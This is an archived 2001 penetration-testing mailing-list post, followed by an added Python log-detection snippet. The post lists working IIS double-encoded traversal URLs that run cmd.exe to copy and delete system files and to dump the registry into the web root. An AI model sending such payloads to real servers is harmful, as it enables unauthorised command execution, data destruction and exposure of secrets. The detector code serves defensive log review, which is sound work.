Penetration Testing mailing list archives

RE: IIS : access to cmd.exe and multiple commands on one line


From: Sam Steinmeyer <SamSteinmeyer () winn-dixie com>
Date: Wed, 24 Oct 2001 13:54:58 -0400

I've tried various combinations myself.  You can call any valid cmd.exe DOS
command. Example:
Copy:
        scripts/..%25%35c../winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\xcopy.exe+c:\Mycopy.exe

Delete:
        scripts/..%25%35c../winnt/system32/cmd.exe?/c+del+c:\winnt\system32\xcopy.exe+c:\Mycopy.exe

Dir with /w
        scripts/..%25%35c../winnt/system32/cmd.exe?/c+dir+/w

Here's a cool one: Dump the registry to a text file and view from web... :)
        scripts/..%25%35c../winnt/system32/cmd.exe?/c+regedit+/e+c:\inetpub\wwwroot\registry.txt

When executing cmd.exe through IIS, you only have one shot. However,
when you are in the DOS Shell, you have the advantage of the Shell to parse
your command lines.
I.e.
dir /w | cmd
You will not be able to mimic this through IIS, due to the absence of the
DOS Shell.

my 2 cents.
         ______
        /_____/\          Harry Steinmeyer
       /____ \\ \         Senior Programmer
      /_____\ \\ /        Winn-Dixie, Inc.
     /_____/ \/ / /       
    /_____/ /   \//\      rm -rf /bin/laden
    \_____\//\   / /
     \_____/ / /\ /       
      \_____/ \\ \        
       \_____\ \\        
        \_____\/          
"Science without religion is lame, religion without science is blind."
Einstein, Albert (1879-1955)
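
For log review, requests of the form quoted in the message above can be recognised by percent-decoding the path until it stops changing and then checking for `..` segments and a shell binary. This is an added example, not part of the original post; the function names and the sample URIs are constructed for illustration (the first two reuse paths quoted in the message).

```python
from urllib.parse import unquote

# Constructed sample request URIs; the first two reuse paths quoted in the post.
SAMPLE_URIS = [
    "/scripts/..%25%35c../winnt/system32/cmd.exe?/c+dir+/w",
    "/scripts/..%25%35c../winnt/system32/cmd.exe"
    "?/c+regedit+/e+c:\\inetpub\\wwwroot\\registry.txt",
    "/images/logo.gif",
    "/search.asp?q=100%25+cotton",   # benign: %25 appears only in the query
]

SHELL_BINARIES = ("cmd.exe", "command.com")


def decode_fully(text, max_rounds=5):
    """Percent-decode until the string stops changing; return (decoded, rounds)."""
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote(text)
        if decoded == text:
            break
        text, rounds = decoded, rounds + 1
    return text, rounds


def inspect_uri(uri):
    """Flag multiply-encoded traversal paths that end at a command interpreter."""
    path, _, query = uri.partition("?")
    decoded_path, rounds = decode_fully(path)
    # Treat backslash as a path separator, as Windows does.
    segments = decoded_path.replace("\\", "/").lower().split("/")
    findings = []
    if rounds > 1:
        findings.append("multi-encoded-path")
    if ".." in segments:
        findings.append("traversal")
    if segments[-1] in SHELL_BINARIES:
        findings.append("shell-binary")
    # '+' separates arguments in the query; show the command only for flagged hits.
    command = decode_fully(query)[0].replace("+", " ") if findings else ""
    return {"uri": uri, "findings": findings, "command": command}


if __name__ == "__main__":
    for uri in SAMPLE_URIS:
        result = inspect_uri(uri)
        if result["findings"]:
            print(",".join(result["findings"]), "|", result["command"])
```
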
